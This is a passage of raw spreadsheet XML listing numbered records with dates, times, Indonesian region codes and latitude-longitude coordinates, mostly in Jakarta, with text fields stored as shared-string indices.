        <v>3174030</v>
      </c>
      <c r="O317">
        <v>3174</v>
      </c>
      <c r="P317">
        <v>31</v>
      </c>
      <c r="Q317" t="s">
        <v>1486</v>
      </c>
      <c r="R317" t="s">
        <v>1487</v>
      </c>
      <c r="S317" t="s">
        <v>32</v>
      </c>
      <c r="T317" t="s">
        <v>33</v>
      </c>
      <c r="U317" s="5">
        <v>10679614</v>
      </c>
      <c r="V317" s="5" t="s">
        <v>14747</v>
      </c>
      <c r="W317" s="5">
        <v>-619925</v>
      </c>
      <c r="X317" t="s">
        <v>18345</v>
      </c>
      <c r="Y317" t="str">
        <f t="shared" si="4"/>
        <v>-6.19925,106.79614</v>
      </c>
    </row>
    <row r="318" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A318">
        <v>101924</v>
      </c>
      <c r="B318" s="1">
        <v>43848</v>
      </c>
      <c r="C318" s="2">
        <v>1.3773148148148147E-2</v>
      </c>
      <c r="D318" t="s">
        <v>22</v>
      </c>
      <c r="E318" t="s">
        <v>23</v>
      </c>
      <c r="F318" t="s">
        <v>1488</v>
      </c>
      <c r="G318" t="s">
        <v>1489</v>
      </c>
      <c r="H318" t="s">
        <v>26</v>
      </c>
      <c r="I318" t="s">
        <v>1490</v>
      </c>
      <c r="J318" t="s">
        <v>1491</v>
      </c>
      <c r="L318" t="s">
        <v>1492</v>
      </c>
      <c r="M318">
        <v>3174070003</v>
      </c>
      <c r="N318">
        <v>3174070</v>
      </c>
      <c r="O318">
        <v>3174</v>
      </c>
      <c r="P318">
        <v>31</v>
      </c>
      <c r="Q318" t="s">
        <v>1260</v>
      </c>
      <c r="R318" t="s">
        <v>84</v>
      </c>
      <c r="S318" t="s">
        <v>32</v>
      </c>
      <c r="T318" t="s">
        <v>33</v>
      </c>
      <c r="U318" s="5">
        <v>10676267</v>
      </c>
      <c r="V318" s="5" t="s">
        <v>14748</v>
      </c>
      <c r="W318" s="5">
        <v>-615906</v>
      </c>
      <c r="X318" t="s">
        <v>18556</v>
      </c>
      <c r="Y318" t="str">
        <f t="shared" si="4"/>
        <v>-6.15906,106.76267</v>
      </c>
    </row>
    <row r="319" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A319">
        <v>101925</v>
      </c>
      <c r="B319" s="1">
        <v>43848</v>
      </c>
      <c r="C319" s="2">
        <v>4.0532407407407406E-2</v>
      </c>
      <c r="D319" t="s">
        <v>22</v>
      </c>
      <c r="E319" t="s">
        <v>23</v>
      </c>
      <c r="F319" t="s">
        <v>1493</v>
      </c>
      <c r="G319" t="s">
        <v>1494</v>
      </c>
      <c r="H319" t="s">
        <v>26</v>
      </c>
      <c r="I319" t="s">
        <v>76</v>
      </c>
      <c r="J319" t="s">
        <v>1478</v>
      </c>
      <c r="L319" t="s">
        <v>1495</v>
      </c>
      <c r="M319">
        <v>3173010001</v>
      </c>
      <c r="N319">
        <v>3173010</v>
      </c>
      <c r="O319">
        <v>3173</v>
      </c>
      <c r="P319">
        <v>31</v>
      </c>
      <c r="Q319" t="s">
        <v>1480</v>
      </c>
      <c r="R319" t="s">
        <v>1481</v>
      </c>
      <c r="S319" t="s">
        <v>62</v>
      </c>
      <c r="T319" t="s">
        <v>33</v>
      </c>
      <c r="U319" s="5">
        <v>10679349</v>
      </c>
      <c r="V319" s="5" t="s">
        <v>14749</v>
      </c>
      <c r="W319" s="5">
        <v>-621164</v>
      </c>
      <c r="X319" t="s">
        <v>18557</v>
      </c>
      <c r="Y319" t="str">
        <f t="shared" si="4"/>
        <v>-6.21164,106.79349</v>
      </c>
    </row>
    <row r="320" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A320">
        <v>101926</v>
      </c>
      <c r="B320" s="1">
        <v>43848</v>
      </c>
      <c r="C320" s="2">
        <v>3.7939814814814815E-2</v>
      </c>
      <c r="D320" t="s">
        <v>22</v>
      </c>
      <c r="E320" t="s">
        <v>23</v>
      </c>
      <c r="F320" t="s">
        <v>1496</v>
      </c>
      <c r="G320" t="s">
        <v>1497</v>
      </c>
      <c r="H320" t="s">
        <v>26</v>
      </c>
      <c r="I320" t="s">
        <v>1498</v>
      </c>
      <c r="J320" t="s">
        <v>1499</v>
      </c>
      <c r="L320" t="s">
        <v>1500</v>
      </c>
      <c r="M320">
        <v>3171050006</v>
      </c>
      <c r="N320">
        <v>3171050</v>
      </c>
      <c r="O320">
        <v>3171</v>
      </c>
      <c r="P320">
        <v>31</v>
      </c>
      <c r="Q320" t="s">
        <v>1501</v>
      </c>
      <c r="R320" t="s">
        <v>508</v>
      </c>
      <c r="S320" t="s">
        <v>108</v>
      </c>
      <c r="T320" t="s">
        <v>33</v>
      </c>
      <c r="U320" s="5">
        <v>10678732</v>
      </c>
      <c r="V320" s="5" t="s">
        <v>14750</v>
      </c>
      <c r="W320" s="5">
        <v>-621495</v>
      </c>
      <c r="X320" t="s">
        <v>18558</v>
      </c>
      <c r="Y320" t="str">
        <f t="shared" si="4"/>
        <v>-6.21495,106.78732</v>
      </c>
    </row>
    <row r="321" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A321">
        <v>101927</v>
      </c>
      <c r="B321" s="1">
        <v>43848</v>
      </c>
      <c r="C321" s="2">
        <v>5.4456018518518522E-2</v>
      </c>
      <c r="D321" t="s">
        <v>22</v>
      </c>
      <c r="E321" t="s">
        <v>23</v>
      </c>
      <c r="F321" t="s">
        <v>1502</v>
      </c>
      <c r="G321" t="s">
        <v>1503</v>
      </c>
      <c r="H321" t="s">
        <v>26</v>
      </c>
      <c r="I321" t="s">
        <v>1504</v>
      </c>
      <c r="J321" t="s">
        <v>1505</v>
      </c>
      <c r="L321" t="s">
        <v>1506</v>
      </c>
      <c r="M321">
        <v>3171060006</v>
      </c>
      <c r="N321">
        <v>3171060</v>
      </c>
      <c r="O321">
        <v>3171</v>
      </c>
      <c r="P321">
        <v>31</v>
      </c>
      <c r="Q321" t="s">
        <v>1313</v>
      </c>
      <c r="R321" t="s">
        <v>1236</v>
      </c>
      <c r="S321" t="s">
        <v>108</v>
      </c>
      <c r="T321" t="s">
        <v>33</v>
      </c>
      <c r="U321" s="5">
        <v>10678905</v>
      </c>
      <c r="V321" s="5" t="s">
        <v>14512</v>
      </c>
      <c r="W321" s="5">
        <v>-624871</v>
      </c>
      <c r="X321" t="s">
        <v>18559</v>
      </c>
      <c r="Y321" t="str">
        <f t="shared" si="4"/>
        <v>-6.24871,106.78905</v>
      </c>
    </row>
    <row r="322" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A322">
        <v>101928</v>
      </c>
      <c r="B322" s="1">
        <v>43848</v>
      </c>
      <c r="C322" s="2">
        <v>6.5960648148148157E-2</v>
      </c>
      <c r="D322" t="s">
        <v>22</v>
      </c>
      <c r="E322" t="s">
        <v>23</v>
      </c>
      <c r="F322" t="s">
        <v>1507</v>
      </c>
      <c r="H322" t="s">
        <v>26</v>
      </c>
      <c r="I322" t="s">
        <v>1194</v>
      </c>
      <c r="J322" t="s">
        <v>1508</v>
      </c>
      <c r="L322" t="s">
        <v>1509</v>
      </c>
      <c r="M322">
        <v>3173010007</v>
      </c>
      <c r="N322">
        <v>3173010</v>
      </c>
      <c r="O322">
        <v>3173</v>
      </c>
      <c r="P322">
        <v>31</v>
      </c>
      <c r="Q322" t="s">
        <v>1510</v>
      </c>
      <c r="R322" t="s">
        <v>1481</v>
      </c>
      <c r="S322" t="s">
        <v>62</v>
      </c>
      <c r="T322" t="s">
        <v>33</v>
      </c>
      <c r="U322" s="5">
        <v>10681480</v>
      </c>
      <c r="V322" s="5" t="s">
        <v>14751</v>
      </c>
      <c r="W322" s="5">
        <v>-618783</v>
      </c>
      <c r="X322" t="s">
        <v>18560</v>
      </c>
      <c r="Y322" t="str">
        <f t="shared" si="4"/>
        <v>-6.18783,106.81480</v>
      </c>
    </row>
    <row r="323" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A323">
        <v>101929</v>
      </c>
      <c r="B323" s="1">
        <v>43848</v>
      </c>
      <c r="C323" s="2">
        <v>0.10790509259259258</v>
      </c>
      <c r="D323" t="s">
        <v>22</v>
      </c>
      <c r="E323" t="s">
        <v>23</v>
      </c>
      <c r="F323" t="s">
        <v>1511</v>
      </c>
      <c r="G323" t="s">
        <v>1512</v>
      </c>
      <c r="H323" t="s">
        <v>26</v>
      </c>
      <c r="I323" t="s">
        <v>1513</v>
      </c>
      <c r="J323" t="s">
        <v>1514</v>
      </c>
      <c r="L323" t="s">
        <v>1515</v>
      </c>
      <c r="M323">
        <v>3171060007</v>
      </c>
      <c r="N323">
        <v>3171060</v>
      </c>
      <c r="O323">
        <v>3171</v>
      </c>
      <c r="P323">
        <v>31</v>
      </c>
      <c r="Q323" t="s">
        <v>1516</v>
      </c>
      <c r="R323" t="s">
        <v>1236</v>
      </c>
      <c r="S323" t="s">
        <v>108</v>
      </c>
      <c r="T323" t="s">
        <v>33</v>
      </c>
      <c r="U323" s="5">
        <v>10678640</v>
      </c>
      <c r="V323" s="5" t="s">
        <v>14752</v>
      </c>
      <c r="W323" s="5">
        <v>-623574</v>
      </c>
      <c r="X323" t="s">
        <v>18561</v>
      </c>
      <c r="Y323" t="str">
        <f t="shared" ref="Y323:Y386" si="5">CONCATENATE(X323,",",V323)</f>
        <v>-6.23574,106.78640</v>
      </c>
    </row>
    <row r="324" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A324">
        <v>101930</v>
      </c>
      <c r="B324" s="1">
        <v>43848</v>
      </c>
      <c r="C324" s="2">
        <v>0.11092592592592593</v>
      </c>
      <c r="D324" t="s">
        <v>22</v>
      </c>
      <c r="E324" t="s">
        <v>23</v>
      </c>
      <c r="F324" t="s">
        <v>1517</v>
      </c>
      <c r="G324" t="s">
        <v>1518</v>
      </c>
      <c r="H324" t="s">
        <v>26</v>
      </c>
      <c r="I324" t="s">
        <v>290</v>
      </c>
      <c r="J324" t="s">
        <v>1519</v>
      </c>
      <c r="L324" t="s">
        <v>1520</v>
      </c>
      <c r="M324">
        <v>3175010003</v>
      </c>
      <c r="N324">
        <v>3175010</v>
      </c>
      <c r="O324">
        <v>3175</v>
      </c>
      <c r="P324">
        <v>31</v>
      </c>
      <c r="Q324" t="s">
        <v>545</v>
      </c>
      <c r="R324" t="s">
        <v>546</v>
      </c>
      <c r="S324" t="s">
        <v>547</v>
      </c>
      <c r="T324" t="s">
        <v>33</v>
      </c>
      <c r="U324" s="5">
        <v>10677686</v>
      </c>
      <c r="V324" s="5" t="s">
        <v>14753</v>
      </c>
      <c r="W324" s="5">
        <v>-614177</v>
      </c>
      <c r="X324" t="s">
        <v>18562</v>
      </c>
      <c r="Y324" t="str">
        <f t="shared" si="5"/>
        <v>-6.14177,106.77686</v>
      </c>
    </row>
    <row r="325" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A325">
        <v>101931</v>
      </c>
      <c r="B325" s="1">
        <v>43848</v>
      </c>
      <c r="C325" s="2">
        <v>0.11309027777777779</v>
      </c>
      <c r="D325" t="s">
        <v>22</v>
      </c>
      <c r="E325" t="s">
        <v>23</v>
      </c>
      <c r="F325" t="s">
        <v>1521</v>
      </c>
      <c r="G325" t="s">
        <v>1522</v>
      </c>
      <c r="H325" t="s">
        <v>26</v>
      </c>
      <c r="I325" t="s">
        <v>1523</v>
      </c>
      <c r="J325" t="s">
        <v>404</v>
      </c>
      <c r="L325" t="s">
        <v>1524</v>
      </c>
      <c r="M325">
        <v>3174020005</v>
      </c>
      <c r="N325">
        <v>3174020</v>
      </c>
      <c r="O325">
        <v>3174</v>
      </c>
      <c r="P325">
        <v>31</v>
      </c>
      <c r="Q325" t="s">
        <v>30</v>
      </c>
      <c r="R325" t="s">
        <v>31</v>
      </c>
      <c r="S325" t="s">
        <v>32</v>
      </c>
      <c r="T325" t="s">
        <v>33</v>
      </c>
      <c r="U325" s="5">
        <v>10676919</v>
      </c>
      <c r="V325" s="5" t="s">
        <v>14754</v>
      </c>
      <c r="W325" s="5">
        <v>-616611</v>
      </c>
      <c r="X325" t="s">
        <v>18563</v>
      </c>
      <c r="Y325" t="str">
        <f t="shared" si="5"/>
        <v>-6.16611,106.76919</v>
      </c>
    </row>
    <row r="326" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A326">
        <v>101932</v>
      </c>
      <c r="B326" s="1">
        <v>43848</v>
      </c>
      <c r="C326" s="2">
        <v>0.28762731481481479</v>
      </c>
      <c r="D326" t="s">
        <v>22</v>
      </c>
      <c r="E326" t="s">
        <v>23</v>
      </c>
      <c r="F326" t="s">
        <v>1525</v>
      </c>
      <c r="H326" t="s">
        <v>26</v>
      </c>
      <c r="I326" t="s">
        <v>1526</v>
      </c>
      <c r="J326" t="s">
        <v>1527</v>
      </c>
      <c r="L326" t="s">
        <v>1528</v>
      </c>
      <c r="M326">
        <v>3174030001</v>
      </c>
      <c r="N326">
        <v>3174030</v>
      </c>
      <c r="O326">
        <v>3174</v>
      </c>
      <c r="P326">
        <v>31</v>
      </c>
      <c r="Q326" t="s">
        <v>1487</v>
      </c>
      <c r="R326" t="s">
        <v>1487</v>
      </c>
      <c r="S326" t="s">
        <v>32</v>
      </c>
      <c r="T326" t="s">
        <v>33</v>
      </c>
      <c r="U326" s="5">
        <v>10679170</v>
      </c>
      <c r="V326" s="5" t="s">
        <v>14755</v>
      </c>
      <c r="W326" s="5">
        <v>-620254</v>
      </c>
      <c r="X326" t="s">
        <v>18564</v>
      </c>
      <c r="Y326" t="str">
        <f t="shared" si="5"/>
        <v>-6.20254,106.79170</v>
      </c>
    </row>
    <row r="327" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A327">
        <v>101933</v>
      </c>
      <c r="B327" s="1">
        <v>43848</v>
      </c>
      <c r="C327" s="2">
        <v>0.45887731481481481</v>
      </c>
      <c r="D327" t="s">
        <v>22</v>
      </c>
      <c r="E327" t="s">
        <v>23</v>
      </c>
      <c r="F327" t="s">
        <v>1529</v>
      </c>
      <c r="G327" t="s">
        <v>1530</v>
      </c>
      <c r="H327" t="s">
        <v>26</v>
      </c>
      <c r="I327" t="s">
        <v>1531</v>
      </c>
      <c r="J327" t="s">
        <v>1532</v>
      </c>
      <c r="L327" t="s">
        <v>1533</v>
      </c>
      <c r="M327">
        <v>3172030002</v>
      </c>
      <c r="N327">
        <v>3172030</v>
      </c>
      <c r="O327">
        <v>3172</v>
      </c>
      <c r="P327">
        <v>31</v>
      </c>
      <c r="Q327" t="s">
        <v>1534</v>
      </c>
      <c r="R327" t="s">
        <v>228</v>
      </c>
      <c r="S327" t="s">
        <v>49</v>
      </c>
      <c r="T327" t="s">
        <v>33</v>
      </c>
      <c r="U327" s="5">
        <v>10691110</v>
      </c>
      <c r="V327" s="5" t="s">
        <v>14756</v>
      </c>
      <c r="W327" s="5">
        <v>-633617</v>
      </c>
      <c r="X327" t="s">
        <v>18565</v>
      </c>
      <c r="Y327" t="str">
        <f t="shared" si="5"/>
        <v>-6.33617,106.91110</v>
      </c>
    </row>
    <row r="328" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A328">
        <v>101938</v>
      </c>
      <c r="B328" s="1">
        <v>43851</v>
      </c>
      <c r="C328" s="2">
        <v>0.28805555555555556</v>
      </c>
      <c r="D328" t="s">
        <v>22</v>
      </c>
      <c r="E328" t="s">
        <v>23</v>
      </c>
      <c r="F328" t="s">
        <v>1535</v>
      </c>
      <c r="H328" t="s">
        <v>26</v>
      </c>
      <c r="I328" t="s">
        <v>784</v>
      </c>
      <c r="J328" t="s">
        <v>586</v>
      </c>
      <c r="L328" t="s">
        <v>1536</v>
      </c>
      <c r="M328">
        <v>3173050002</v>
      </c>
      <c r="N328">
        <v>3173050</v>
      </c>
      <c r="O328">
        <v>3173</v>
      </c>
      <c r="P328">
        <v>31</v>
      </c>
      <c r="Q328" t="s">
        <v>588</v>
      </c>
      <c r="R328" t="s">
        <v>589</v>
      </c>
      <c r="S328" t="s">
        <v>62</v>
      </c>
      <c r="T328" t="s">
        <v>33</v>
      </c>
      <c r="U328" s="5">
        <v>10686539</v>
      </c>
      <c r="V328" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W328" s="5">
        <v>-617469</v>
      </c>
      <c r="X328" t="s">
        <v>18368</v>
      </c>
      <c r="Y328" t="str">
        <f t="shared" si="5"/>
        <v>-6.17469,106.86539</v>
      </c>
    </row>
    <row r="329" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A329">
        <v>101940</v>
      </c>
      <c r="B329" s="1">
        <v>43851</v>
      </c>
      <c r="C329" s="2">
        <v>0.29219907407407408</v>
      </c>
      <c r="D329" t="s">
        <v>22</v>
      </c>
      <c r="E329" t="s">
        <v>23</v>
      </c>
      <c r="F329" t="s">
        <v>1537</v>
      </c>
      <c r="H329" t="s">
        <v>26</v>
      </c>
      <c r="I329" t="s">
        <v>1538</v>
      </c>
      <c r="J329" t="s">
        <v>586</v>
      </c>
      <c r="L329" t="s">
        <v>1539</v>
      </c>
      <c r="M329">
        <v>3173050002</v>
      </c>
      <c r="N329">
        <v>3173050</v>
      </c>
      <c r="O329">
        <v>3173</v>
      </c>
      <c r="P329">
        <v>31</v>
      </c>
      <c r="Q329" t="s">
        <v>588</v>
      </c>
      <c r="R329" t="s">
        <v>589</v>
      </c>
      <c r="S329" t="s">
        <v>62</v>
      </c>
      <c r="T329" t="s">
        <v>33</v>
      </c>
      <c r="U329" s="5">
        <v>10686539</v>
      </c>
      <c r="V329" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W329" s="5">
        <v>-617469</v>
      </c>
      <c r="X329" t="s">
        <v>18368</v>
      </c>
      <c r="Y329" t="str">
        <f t="shared" si="5"/>
        <v>-6.17469,106.86539</v>
      </c>
    </row>
    <row r="330" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A330">
        <v>101950</v>
      </c>
      <c r="B330" s="1">
        <v>43851</v>
      </c>
      <c r="C330" s="2">
        <v>0.32109953703703703</v>
      </c>
      <c r="D330" t="s">
        <v>22</v>
      </c>
      <c r="E330" t="s">
        <v>23</v>
      </c>
      <c r="F330" t="s">
        <v>1540</v>
      </c>
      <c r="G330" t="s">
        <v>1541</v>
      </c>
      <c r="H330" t="s">
        <v>26</v>
      </c>
      <c r="I330" t="s">
        <v>1542</v>
      </c>
      <c r="J330" t="s">
        <v>1342</v>
      </c>
      <c r="L330" t="s">
        <v>1543</v>
      </c>
      <c r="M330">
        <v>3578100006</v>
      </c>
      <c r="N330">
        <v>3578100</v>
      </c>
      <c r="O330">
        <v>3578</v>
      </c>
      <c r="P330">
        <v>35</v>
      </c>
      <c r="Q330" t="s">
        <v>1544</v>
      </c>
      <c r="R330" t="s">
        <v>1545</v>
      </c>
      <c r="S330" t="s">
        <v>1346</v>
      </c>
      <c r="T330" t="s">
        <v>1221</v>
      </c>
      <c r="U330" s="5">
        <v>11276496</v>
      </c>
      <c r="V330" s="5" t="s">
        <v>14757</v>
      </c>
      <c r="W330" s="5">
        <v>-727244</v>
      </c>
      <c r="X330" t="s">
        <v>18566</v>
      </c>
      <c r="Y330" t="str">
        <f t="shared" si="5"/>
        <v>-7.27244,112.76496</v>
      </c>
    </row>
    <row r="331" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A331">
        <v>101951</v>
      </c>
      <c r="B331" s="1">
        <v>43851</v>
      </c>
      <c r="C331" s="2">
        <v>0.3225115740740741</v>
      </c>
      <c r="D331" t="s">
        <v>22</v>
      </c>
      <c r="E331" t="s">
        <v>23</v>
      </c>
      <c r="F331" t="s">
        <v>1546</v>
      </c>
      <c r="G331" t="s">
        <v>1547</v>
      </c>
      <c r="H331" t="s">
        <v>26</v>
      </c>
      <c r="I331" t="s">
        <v>628</v>
      </c>
      <c r="J331" t="s">
        <v>586</v>
      </c>
      <c r="L331" t="s">
        <v>1548</v>
      </c>
      <c r="M331">
        <v>3173050002</v>
      </c>
      <c r="N331">
        <v>3173050</v>
      </c>
      <c r="O331">
        <v>3173</v>
      </c>
      <c r="P331">
        <v>31</v>
      </c>
      <c r="Q331" t="s">
        <v>588</v>
      </c>
      <c r="R331" t="s">
        <v>589</v>
      </c>
      <c r="S331" t="s">
        <v>62</v>
      </c>
      <c r="T331" t="s">
        <v>33</v>
      </c>
      <c r="U331" s="5">
        <v>10686500</v>
      </c>
      <c r="V331" s="5" t="s">
        <v>14568</v>
      </c>
      <c r="W331" s="5">
        <v>-617510</v>
      </c>
      <c r="X331" t="s">
        <v>18382</v>
      </c>
      <c r="Y331" t="str">
        <f t="shared" si="5"/>
        <v>-6.17510,106.86500</v>
      </c>
    </row>
    <row r="332" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A332">
        <v>101954</v>
      </c>
      <c r="B332" s="1">
        <v>43851</v>
      </c>
      <c r="C332" s="2">
        <v>0.54969907407407403</v>
      </c>
      <c r="D332" t="s">
        <v>22</v>
      </c>
      <c r="E332" t="s">
        <v>23</v>
      </c>
      <c r="F332" t="s">
        <v>1549</v>
      </c>
      <c r="G332" t="s">
        <v>1550</v>
      </c>
      <c r="H332" t="s">
        <v>26</v>
      </c>
      <c r="I332" t="s">
        <v>1046</v>
      </c>
      <c r="J332" t="s">
        <v>1551</v>
      </c>
      <c r="L332" t="s">
        <v>1552</v>
      </c>
      <c r="M332">
        <v>3174040006</v>
      </c>
      <c r="N332">
        <v>3174040</v>
      </c>
      <c r="O332">
        <v>3174</v>
      </c>
      <c r="P332">
        <v>31</v>
      </c>
      <c r="Q332" t="s">
        <v>1553</v>
      </c>
      <c r="R332" t="s">
        <v>377</v>
      </c>
      <c r="S332" t="s">
        <v>32</v>
      </c>
      <c r="T332" t="s">
        <v>33</v>
      </c>
      <c r="U332" s="5">
        <v>10677516</v>
      </c>
      <c r="V332" s="5" t="s">
        <v>14758</v>
      </c>
      <c r="W332" s="5">
        <v>-615213</v>
      </c>
      <c r="X332" t="s">
        <v>18567</v>
      </c>
      <c r="Y332" t="str">
        <f t="shared" si="5"/>
        <v>-6.15213,106.77516</v>
      </c>
    </row>
    <row r="333" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A333">
        <v>101959</v>
      </c>
      <c r="B333" s="1">
        <v>43854</v>
      </c>
      <c r="C333" s="2">
        <v>0.12815972222222222</v>
      </c>
      <c r="D333" t="s">
        <v>22</v>
      </c>
      <c r="E333" t="s">
        <v>23</v>
      </c>
      <c r="F333" t="s">
        <v>1554</v>
      </c>
      <c r="G333" t="s">
        <v>1555</v>
      </c>
      <c r="H333" t="s">
        <v>26</v>
      </c>
      <c r="I333" t="s">
        <v>1556</v>
      </c>
      <c r="J333" t="s">
        <v>586</v>
      </c>
      <c r="L333" t="s">
        <v>1557</v>
      </c>
      <c r="M333">
        <v>3173050002</v>
      </c>
      <c r="N333">
        <v>3173050</v>
      </c>
      <c r="O333">
        <v>3173</v>
      </c>
      <c r="P333">
        <v>31</v>
      </c>
      <c r="Q333" t="s">
        <v>588</v>
      </c>
      <c r="R333" t="s">
        <v>589</v>
      </c>
      <c r="S333" t="s">
        <v>62</v>
      </c>
      <c r="T333" t="s">
        <v>33</v>
      </c>
      <c r="U333" s="5">
        <v>10686539</v>
      </c>
      <c r="V333" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W333" s="5">
        <v>-617469</v>
      </c>
      <c r="X333" t="s">
        <v>18368</v>
      </c>
      <c r="Y333" t="str">
        <f t="shared" si="5"/>
        <v>-6.17469,106.86539</v>
      </c>
    </row>
    <row r="334" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A334">
        <v>101960</v>
      </c>
      <c r="B334" s="1">
        <v>43854</v>
      </c>
      <c r="C334" s="2">
        <v>0.14307870370370371</v>
      </c>
      <c r="D334" t="s">
        <v>22</v>
      </c>
      <c r="E334" t="s">
        <v>23</v>
      </c>
      <c r="F334" t="s">
        <v>1558</v>
      </c>
      <c r="H334" t="s">
        <v>26</v>
      </c>
      <c r="I334" t="s">
        <v>1559</v>
      </c>
      <c r="J334" t="s">
        <v>1560</v>
      </c>
      <c r="L334" t="s">
        <v>1561</v>
      </c>
      <c r="M334">
        <v>3175030007</v>
      </c>
      <c r="N334">
        <v>3175030</v>
      </c>
      <c r="O334">
        <v>3175</v>
      </c>
      <c r="P334">
        <v>31</v>
      </c>
      <c r="Q334" t="s">
        <v>1562</v>
      </c>
      <c r="R334" t="s">
        <v>1563</v>
      </c>
      <c r="S334" t="s">
        <v>547</v>
      </c>
      <c r="T334" t="s">
        <v>33</v>
      </c>
      <c r="U334" s="5">
        <v>10687558</v>
      </c>
      <c r="V334" s="5" t="s">
        <v>14759</v>
      </c>
      <c r="W334" s="5">
        <v>-611565</v>
      </c>
      <c r="X334" t="s">
        <v>18568</v>
      </c>
      <c r="Y334" t="str">
        <f t="shared" si="5"/>
        <v>-6.11565,106.87558</v>
      </c>
    </row>
    <row r="335" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A335">
        <v>101961</v>
      </c>
      <c r="B335" s="1">
        <v>43854</v>
      </c>
      <c r="C335" s="2">
        <v>0.14476851851851852</v>
      </c>
      <c r="D335" t="s">
        <v>22</v>
      </c>
      <c r="E335" t="s">
        <v>23</v>
      </c>
      <c r="F335" t="s">
        <v>1564</v>
      </c>
      <c r="G335" t="s">
        <v>1565</v>
      </c>
      <c r="H335" t="s">
        <v>26</v>
      </c>
      <c r="I335" t="s">
        <v>166</v>
      </c>
      <c r="J335" t="s">
        <v>1566</v>
      </c>
      <c r="L335" t="s">
        <v>1567</v>
      </c>
      <c r="M335">
        <v>3175030005</v>
      </c>
      <c r="N335">
        <v>3175030</v>
      </c>
      <c r="O335">
        <v>3175</v>
      </c>
      <c r="P335">
        <v>31</v>
      </c>
      <c r="Q335" t="s">
        <v>1568</v>
      </c>
      <c r="R335" t="s">
        <v>1563</v>
      </c>
      <c r="S335" t="s">
        <v>547</v>
      </c>
      <c r="T335" t="s">
        <v>33</v>
      </c>
      <c r="U335" s="5">
        <v>10688588</v>
      </c>
      <c r="V335" s="5" t="s">
        <v>14760</v>
      </c>
      <c r="W335" s="5">
        <v>-613511</v>
      </c>
      <c r="X335" t="s">
        <v>18569</v>
      </c>
      <c r="Y335" t="str">
        <f t="shared" si="5"/>
        <v>-6.13511,106.88588</v>
      </c>
    </row>
    <row r="336" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A336">
        <v>101962</v>
      </c>
      <c r="B336" s="1">
        <v>43854</v>
      </c>
      <c r="C336" s="2">
        <v>0.14546296296296296</v>
      </c>
      <c r="D336" t="s">
        <v>22</v>
      </c>
      <c r="E336" t="s">
        <v>23</v>
      </c>
      <c r="F336" t="s">
        <v>1569</v>
      </c>
      <c r="G336" t="s">
        <v>1570</v>
      </c>
      <c r="H336" t="s">
        <v>26</v>
      </c>
      <c r="I336" t="s">
        <v>1571</v>
      </c>
      <c r="J336" t="s">
        <v>1572</v>
      </c>
      <c r="L336" t="s">
        <v>1573</v>
      </c>
      <c r="M336">
        <v>3175030001</v>
      </c>
      <c r="N336">
        <v>3175030</v>
      </c>
      <c r="O336">
        <v>3175</v>
      </c>
      <c r="P336">
        <v>31</v>
      </c>
      <c r="Q336" t="s">
        <v>1574</v>
      </c>
      <c r="R336" t="s">
        <v>1563</v>
      </c>
      <c r="S336" t="s">
        <v>547</v>
      </c>
      <c r="T336" t="s">
        <v>33</v>
      </c>
      <c r="U336" s="5">
        <v>10686045</v>
      </c>
      <c r="V336" s="5" t="s">
        <v>14761</v>
      </c>
      <c r="W336" s="5">
        <v>-613372</v>
      </c>
      <c r="X336" t="s">
        <v>18570</v>
      </c>
      <c r="Y336" t="str">
        <f t="shared" si="5"/>
        <v>-6.13372,106.86045</v>
      </c>
    </row>
    <row r="337" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A337">
        <v>101963</v>
      </c>
      <c r="B337" s="1">
        <v>43854</v>
      </c>
      <c r="C337" s="2">
        <v>0.14806712962962962</v>
      </c>
      <c r="D337" t="s">
        <v>22</v>
      </c>
      <c r="E337" t="s">
        <v>23</v>
      </c>
      <c r="F337" t="s">
        <v>1575</v>
      </c>
      <c r="H337" t="s">
        <v>26</v>
      </c>
      <c r="I337" t="s">
        <v>845</v>
      </c>
      <c r="J337" t="s">
        <v>1576</v>
      </c>
      <c r="L337" t="s">
        <v>1577</v>
      </c>
      <c r="M337">
        <v>3173070005</v>
      </c>
      <c r="N337">
        <v>3173070</v>
      </c>
      <c r="O337">
        <v>3173</v>
      </c>
      <c r="P337">
        <v>31</v>
      </c>
      <c r="Q337" t="s">
        <v>1578</v>
      </c>
      <c r="R337" t="s">
        <v>323</v>
      </c>
      <c r="S337" t="s">
        <v>62</v>
      </c>
      <c r="T337" t="s">
        <v>33</v>
      </c>
      <c r="U337" s="5">
        <v>10682500</v>
      </c>
      <c r="V337" s="5" t="s">
        <v>14762</v>
      </c>
      <c r="W337" s="5">
        <v>-613642</v>
      </c>
      <c r="X337" t="s">
        <v>18571</v>
      </c>
      <c r="Y337" t="str">
        <f t="shared" si="5"/>
        <v>-6.13642,106.82500</v>
      </c>
    </row>
    <row r="338" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A338">
        <v>101964</v>
      </c>
      <c r="B338" s="1">
        <v>43854</v>
      </c>
      <c r="C338" s="2">
        <v>0.14876157407407406</v>
      </c>
      <c r="D338" t="s">
        <v>22</v>
      </c>
      <c r="E338" t="s">
        <v>23</v>
      </c>
      <c r="F338" t="s">
        <v>1579</v>
      </c>
      <c r="G338" t="s">
        <v>1580</v>
      </c>
      <c r="H338" t="s">
        <v>26</v>
      </c>
      <c r="I338" t="s">
        <v>1571</v>
      </c>
      <c r="J338" t="s">
        <v>1100</v>
      </c>
      <c r="L338" t="s">
        <v>1581</v>
      </c>
      <c r="M338">
        <v>3172090007</v>
      </c>
      <c r="N338">
